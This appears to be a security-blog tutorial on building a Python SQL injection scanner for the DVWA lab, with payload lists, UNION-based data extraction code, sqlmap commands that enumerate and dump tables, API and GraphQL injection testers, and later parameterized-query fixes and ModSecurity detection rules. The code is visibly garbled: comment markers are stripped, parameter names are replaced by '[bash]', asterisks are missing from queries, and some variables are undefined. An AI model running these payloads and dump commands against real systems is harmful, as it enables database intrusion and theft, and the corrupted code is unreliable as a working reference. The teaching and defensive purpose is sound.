Building a Python-Based SQL Injection Scanner: A Hands-On Guide to Web Security Testing + Video

Listen to this Post

Featured Image

Introduction

SQL injection remains one of the most critical and persistent web application vulnerabilities, consistently ranking in the OWASP Top 10. Understanding how these attacks work—and how to detect them—is essential for any cybersecurity professional. This article explores a practical Python-based SQL injection scanner project, demonstrating how automated tools can identify vulnerable input points through crafted payloads, concurrency handling, and ethical testing methodologies in controlled environments like DVWA.

Learning Objectives

  • Understand the mechanics of SQL injection attacks and how automated scanners detect them
  • Learn to build a Python scanner with request handling, payload delivery, and response analysis
  • Implement concurrency and rate-limiting for efficient and responsible vulnerability scanning
  • Master ethical testing practices using local lab environments like DVWA
  • Explore mitigation strategies and secure coding practices to prevent SQL injection

You Should Know

1. Understanding the SQL Injection Scanner Architecture

The Python-based scanner developed by Ziyan Lakhani represents a practical implementation of web vulnerability testing tools. At its core, the scanner works by sending specially crafted HTTP requests to web application inputs and analyzing responses for indicators of SQL injection vulnerabilities.

Key components of the scanner include:

  • Payload generation: A collection of SQL injection strings designed to trigger database errors or behavioral changes
  • Request engine: Handles HTTP communications with target applications
  • Response analyzer: Examines server responses for error messages, timing differences, or content variations
  • Concurrency manager: Controls simultaneous scan operations to balance speed and server load
  • Logger: Records findings with severity levels and request details

Basic scanner structure in Python:

import requests
import threading
from queue import Queue
import time
import re

class SQLiScanner:
def <strong>init</strong>(self, target_url, params, threads=5, delay=1):
self.target_url = target_url
self.params = params
self.threads = threads
self.delay = delay
self.payloads = [
"'",
"' OR '1'='1",
"' OR '1'='1' --",
"' UNION SELECT NULL--",
"'; DROP TABLE users--",
"' AND SLEEP(5)--",
"' WAITFOR DELAY '00:00:05'--"
]
self.vulnerabilities = []
self.queue = Queue()

def load_payloads(self):
for payload in self.payloads:
self.queue.put(payload)

def test_payload(self, payload):
test_params = self.params.copy()
for param in test_params:
test_params[bash] = payload
try:
start_time = time.time()
response = requests.get(self.target_url, params=test_params, timeout=10)
response_time = time.time() - start_time

Check for SQL error indicators
if self.detect_sql_error(response.text):
self.vulnerabilities.append({
'parameter': param,
'payload': payload,
'type': 'Error-based SQLi',
'time': response_time
})

Check for time-based blind injection
if response_time > 4.5 and ('SLEEP' in payload or 'WAITFOR' in payload):
self.vulnerabilities.append({
'parameter': param,
'payload': payload,
'type': 'Time-based Blind SQLi',
'time': response_time
})

except Exception as e:
print(f"Error testing {param} with {payload}: {e}")

time.sleep(self.delay)

def detect_sql_error(self, response_text):
error_patterns = [
"SQL syntax",
"mysql_fetch",
"ORA-[0-9]",
"PostgreSQL",
"SQLite",
"unclosed quotation mark",
"Microsoft OLE DB",
"Incorrect syntax near"
]
for pattern in error_patterns:
if re.search(pattern, response_text, re.IGNORECASE):
return True
return False

def run_scan(self):
self.load_payloads()
threads = []
for _ in range(self.threads):
t = threading.Thread(target=self.worker)
t.start()
threads.append(t)

for t in threads:
t.join()

return self.vulnerabilities

def worker(self):
while not self.queue.empty():
payload = self.queue.get()
self.test_payload(payload)
self.queue.task_done()

Usage example for DVWA
scanner = SQLiScanner(
target_url="http://localhost/dvwa/vulnerabilities/sqli/",
params={"id": "1", "Submit": "Submit"},
threads=3,
delay=0.5
)
results = scanner.run_scan()
for vuln in results:
print(f"Vulnerability found: {vuln}")

2. Setting Up Your Ethical Testing Environment

Before running any security tools, you must establish a controlled testing environment. The Damn Vulnerable Web Application (DVWA) provides an ideal platform for practicing SQL injection detection without legal or ethical concerns.

Installing DVWA on Linux (Ubuntu/Debian):

 Update system and install prerequisites
sudo apt update
sudo apt install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php git -y

Start services
sudo systemctl start apache2
sudo systemctl start mysql

Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWA/

Configure DVWA
cd DVWA/config
sudo cp config.inc.php.dist config.inc.php
sudo nano config.inc.php  Set database password

Set up database
sudo mysql -u root -p
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa. TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;

Installing DVWA on Windows (using XAMPP):

 Download and install XAMPP from https://www.apachefriends.org/
 Start Apache and MySQL from XAMPP Control Panel

Navigate to htdocs
cd C:\xampp\htdocs

Clone DVWA (requires Git for Windows)
git clone https://github.com/digininja/DVWA.git

Copy configuration file
copy C:\xampp\htdocs\DVWA\config\config.inc.php.dist C:\xampp\htdocs\DVWA\config\config.inc.php

Edit config file to set database credentials
notepad C:\xampp\htdocs\DVWA\config\config.inc.php

Access DVWA at http://localhost/DVWA/setup.php
 Click "Create/Reset Database" and log in with admin/password

Docker alternative for quick setup:

 Run DVWA in Docker container
docker run --rm -it -p 80:80 vulnerables/web-dvwa

Access at http://localhost

3. Advanced SQL Injection Detection Techniques

Modern SQL injection scanners must evolve beyond simple error-based detection. Understanding different injection types helps build more comprehensive testing tools.

Boolean-based blind injection testing:

def test_boolean_blind(self, base_param, true_payload, false_payload):
"""Test for boolean-based blind SQL injection"""

Send request with condition expected to be true
true_params = self.params.copy()
true_params[bash] = f"1' AND 1=1 {true_payload}"
true_response = requests.get(self.target_url, params=true_params)
true_content = true_response.text

Send request with condition expected to be false
false_params = self.params.copy()
false_params[bash] = f"1' AND 1=2 {false_payload}"
false_response = requests.get(self.target_url, params=false_params)
false_content = false_response.text

If responses differ significantly, likely vulnerable
if self.calculate_similarity(true_content, false_content) < 0.8:
return True
return False

def calculate_similarity(self, text1, text2):
"""Simple similarity ratio based on length difference"""
len1, len2 = len(text1), len(text2)
if len1 == 0 and len2 == 0:
return 1.0
return 1.0 - abs(len1 - len2) / max(len1, len2)

Union-based injection extraction:

def extract_data_union(self, vulnerable_param, column_count):
"""Attempt to extract data using UNION-based injection"""

Determine number of columns
for i in range(1, 10):
payload = f"1' ORDER BY {i}-- -"
params = self.params.copy()
params[bash] = payload
response = requests.get(self.target_url, params=params)

if "Unknown column" in response.text or error_detected:
column_count = i - 1
break

Extract database information
if column_count:
union_payload = f"-1' UNION SELECT "
for j in range(column_count):
if j == 0:
union_payload += "database(),"
elif j == column_count - 1:
union_payload += "user()-- -"
else:
union_payload += f"NULL,"

params = self.params.copy()
params[bash] = union_payload
response = requests.get(self.target_url, params=params)

Parse response for extracted data
return self.extract_data_from_response(response.text)

return None

4. Implementing Concurrency and Rate Limiting

Efficient scanning requires balancing speed with responsible resource usage. Python’s threading and queue modules enable concurrent testing while maintaining control over request rates.

Advanced concurrency manager with rate limiting:

import threading
import time
from queue import Queue
from threading import Semaphore

class RateLimiter:
"""Token bucket rate limiter implementation"""
def <strong>init</strong>(self, max_requests_per_second):
self.rate = max_requests_per_second
self.tokens = max_requests_per_second
self.last_refill = time.time()
self.lock = threading.Lock()

def acquire(self):
with self.lock:
now = time.time()
elapsed = now - self.last_refill
self.tokens = min(self.rate, self.tokens + elapsed  self.rate)
self.last_refill = now

if self.tokens >= 1:
self.tokens -= 1
return True
else:
wait_time = (1 - self.tokens) / self.rate
time.sleep(wait_time)
self.tokens = 0
return True

class ConcurrentScanner:
def <strong>init</strong>(self, target, payloads, max_threads=10, requests_per_second=5):
self.target = target
self.payloads = payloads
self.max_threads = max_threads
self.rate_limiter = RateLimiter(requests_per_second)
self.results = []
self.results_lock = threading.Lock()
self.active_threads = Semaphore(max_threads)
self.completed = 0
self.total = len(payloads)

def scan_payload(self, payload):
"""Execute scan for a single payload with rate limiting"""
self.rate_limiter.acquire()

try:
 Perform the actual request
response = requests.get(
self.target,
params={"id": payload},
timeout=5,
headers={"User-Agent": "SQLi-Scanner/1.0"}
)

Analyze response
result = self.analyze_response(payload, response)

with self.results_lock:
if result["vulnerable"]:
self.results.append(result)
self.completed += 1
print(f"Progress: {self.completed}/{self.total} ({self.completed/self.total100:.1f}%)")

except Exception as e:
with self.results_lock:
self.completed += 1
print(f"Error with payload {payload}: {e}")
finally:
self.active_threads.release()

def run(self):
"""Start concurrent scanning"""
threads = []

for payload in self.payloads:
self.active_threads.acquire()
t = threading.Thread(target=self.scan_payload, args=(payload,))
t.start()
threads.append(t)

Wait for all threads to complete
for t in threads:
t.join()

return self.results

def analyze_response(self, payload, response):
"""Analyze response for vulnerability indicators"""
vulnerable = False
evidence = None

Check for SQL errors
sql_errors = [
"mysql", "sql", "syntax", "ORA-", "PostgreSQL",
"SQLite", "unclosed quotation", "Microsoft"
]

for error in sql_errors:
if error.lower() in response.text.lower():
vulnerable = True
evidence = f"SQL error detected: {error}"
break

Check for behavioral changes
if "SLEEP" in payload and response.elapsed.total_seconds() > 4:
vulnerable = True
evidence = "Time-based injection detected"

return {
"payload": payload,
"vulnerable": vulnerable,
"evidence": evidence,
"status_code": response.status_code,
"response_time": response.elapsed.total_seconds(),
"response_size": len(response.text)
}

5. Manual SQL Injection Testing with SQLmap

While custom scanners are educational, professional penetration testers often use specialized tools like SQLmap for comprehensive assessments. Understanding SQLmap complements your Python scanner knowledge.

Basic SQLmap commands for testing:

 Basic GET parameter test
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

POST parameter test with data
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

Enumerate databases
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --dbs

Enumerate tables from a specific database
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa --tables

Dump table contents
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump

Advanced options with proxy for debugging
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --proxy="http://127.0.0.1:8080" --batch

Using SQLmap with request files for complex scenarios:

 Capture request in Burp Suite and save to request.txt
 Then run SQLmap with the request file
sqlmap -r request.txt --batch --level=3 --risk=2

For authenticated scans, include cookies
sqlmap -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=abc123; security=low"

6. Mitigation Strategies and Secure Coding Practices

Understanding vulnerabilities is only half the battle; knowing how to prevent them is equally crucial. Implementing proper defenses protects applications from SQL injection attacks.

Parameterized queries in various languages:

 Python with SQLite (safe)
import sqlite3

def safe_get_user(user_id):
conn = sqlite3.connect('database.db')
cursor = conn.cursor()

Parameterized query prevents injection
cursor.execute("SELECT  FROM users WHERE id = ?", (user_id,))
return cursor.fetchone()

Python with MySQL
import mysql.connector

def safe_get_user_mysql(user_id):
conn = mysql.connector.connect(user='root', password='password', host='localhost', database='test')
cursor = conn.cursor()

Parameterized query
cursor.execute("SELECT  FROM users WHERE id = %s", (user_id,))
return cursor.fetchone()
<?php
// PHP with MySQLi (safe)
$mysqli = new mysqli("localhost", "user", "password", "database");
$stmt = $mysqli->prepare("SELECT  FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();

// PHP with PDO (safe)
$pdo = new PDO("mysql:host=localhost;dbname=database", "user", "password");
$stmt = $pdo->prepare("SELECT  FROM users WHERE id = :id");
$stmt->execute(['id' => $_GET['id']]);
$user = $stmt->fetch();
?>
// Java with PreparedStatement (safe)
public User getUserById(String userId) {
String sql = "SELECT  FROM users WHERE id = ?";
try (Connection conn = dataSource.getConnection();
PreparedStatement pstmt = conn.prepareStatement(sql)) {
pstmt.setString(1, userId);
ResultSet rs = pstmt.executeQuery();
if (rs.next()) {
return mapUser(rs);
}
} catch (SQLException e) {
logger.error("Database error", e);
}
return null;
}

Input validation and sanitization:

import re

def validate_user_input(input_string):
"""Validate and sanitize user input"""

Whitelist approach - only allow alphanumeric and specific characters
if not re.match("^[a-zA-Z0-9_@. -]+$", input_string):
return None

Escape special characters
sanitized = input_string.replace("'", "''").replace("\", "\\")
return sanitized

Implement proper input validation
def process_request(user_input):
validated = validate_user_input(user_input)
if validated is None:
return "Invalid input detected", 400

Proceed with validated input
return process_validated_input(validated)

Web application firewall (WAF) rules with ModSecurity:

 ModSecurity rule for SQL injection prevention
SecRule ARGS "@detectSQLi" \
"id:1000,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection Attack Detected',\
logdata:'%{MATCHED_VAR}',\
severity:'CRITICAL'"

Custom regex pattern for SQL injection detection
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/ "@rx (?i:(union.+select|select.+from|insert.+into|delete.+from|update.+set|drop.+table|exec.+xp_cmdshell))" \
"id:1001,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection Pattern Detected'"

7. Cloud and API Security Testing

Modern applications increasingly rely on APIs and cloud services, introducing new vectors for injection attacks. Testing these environments requires additional considerations.

API security testing script:

import requests
import json
from concurrent.futures import ThreadPoolExecutor

class APISecurityTester:
def <strong>init</strong>(self, base_url, api_key=None):
self.base_url = base_url
self.headers = {
'Content-Type': 'application/json',
'User-Agent': 'API-Security-Scanner/1.0'
}
if api_key:
self.headers['Authorization'] = f'Bearer {api_key}'

def test_sqli_in_json(self, endpoint, param_path):
"""Test for SQL injection in JSON API endpoints"""

payloads = [
{"value": "' OR '1'='1", "expected": "sql_error"},
{"value": "1' UNION SELECT  FROM users--", "expected": "data_leak"},
{"value": "1'; DROP TABLE users--", "expected": "error"},
{"value": "1' AND SLEEP(5)--", "expected": "delay"}
]

results = []

for payload in payloads:
 Construct JSON body with injected payload
json_body = self.build_nested_json(param_path, payload["value"])

try:
start_time = time.time()
response = requests.post(
f"{self.base_url}{endpoint}",
headers=self.headers,
json=json_body,
timeout=10
)
response_time = time.time() - start_time

Analyze response
vulnerable = self.analyze_api_response(
response, 
response_time, 
payload["expected"]
)

results.append({
"endpoint": endpoint,
"payload": payload["value"],
"vulnerable": vulnerable,
"status_code": response.status_code,
"response_time": response_time
})

except Exception as e:
print(f"Error testing {endpoint}: {e}")

return results

def build_nested_json(self, param_path, value):
"""Build nested JSON from dot notation path (e.g., 'user.profile.id')"""
parts = param_path.split('.')
result = {}
current = result

for i, part in enumerate(parts):
if i == len(parts) - 1:
current[bash] = value
else:
current[bash] = {}
current = current[bash]

return result

def analyze_api_response(self, response, response_time, expected):
"""Analyze API response for vulnerability indicators"""

Check for SQL errors in response
if response.status_code == 500:
if "sql" in response.text.lower() or "database" in response.text.lower():
return True

Check for time-based injection
if expected == "delay" and response_time > 4.5:
return True

Check for data leakage
if response.status_code == 200 and "users" in response.text.lower():
return True

return False

def scan_graphql_endpoint(self, endpoint):
"""Test GraphQL endpoints for injection vulnerabilities"""

graphql_payloads = [
{
"query": "query { user(id: \"1' OR '1'='1\") { name email } }",
"name": "boolean_based"
},
{
"query": "query { user(id: \"1' UNION SELECT  FROM users--\") { name email } }",
"name": "union_based"
},
{
"query": "query { __schema { types { name fields { name } } } }",
"name": "introspection"
}
]

for payload in graphql_payloads:
response = requests.post(
f"{self.base_url}{endpoint}",
headers=self.headers,
json=payload
)

if response.status_code == 200:
if "errors" in response.json():
error_msg = response.json()["errors"][bash]["message"]
if "sql" in error_msg.lower() or "database" in error_msg.lower():
print(f"Potential SQLi in GraphQL: {payload['name']}")

What Undercode Say

Key Takeaway 1: Building custom security tools provides invaluable hands-on experience with vulnerability mechanics, but always remember that ethical boundaries and legal permissions must precede any testing activity. The Python SQL injection scanner demonstrates how automated tools work, yet professional assessments should combine custom scripts with established frameworks like SQLmap for comprehensive coverage.

Key Takeaway 2: SQL injection prevention is fundamentally about treating user input as data, not executable code. Parameterized queries, input validation, and principle of least privilege form the foundation of defense. The most sophisticated scanner cannot protect an application that doesn’t implement these basic security controls.

The journey from understanding SQL injection to building detection tools and implementing defenses represents a complete security mindset evolution. This project exemplifies how hands-on development bridges theoretical knowledge with practical application. As web technologies evolve, so too will injection techniques—making continuous learning and adaptation essential skills for security professionals. The Python scanner approach, combined with proper testing environments like DVWA, creates a safe space to explore vulnerabilities before encountering them in production systems. Remember that the goal isn’t just finding flaws, but understanding them deeply enough to build more secure applications from the start.

Prediction

As artificial intelligence and machine learning integrate into web applications, SQL injection attacks will likely evolve to target AI-driven database queries and vector databases. We’ll see the emergence of “AI-assisted injection” where attackers use language models to craft context-aware payloads that bypass traditional WAF rules. Simultaneously, defensive tools will incorporate behavioral analysis and anomaly detection to identify injection attempts based on query patterns rather than signatures. The next generation of SQL injection scanners will need to understand application logic and database schemas to identify complex, multi-stage injection vulnerabilities that current tools miss. Cloud-native applications with serverless databases will require new testing methodologies as traditional connection-based detection becomes obsolete.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Ziyanlakhani Github – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky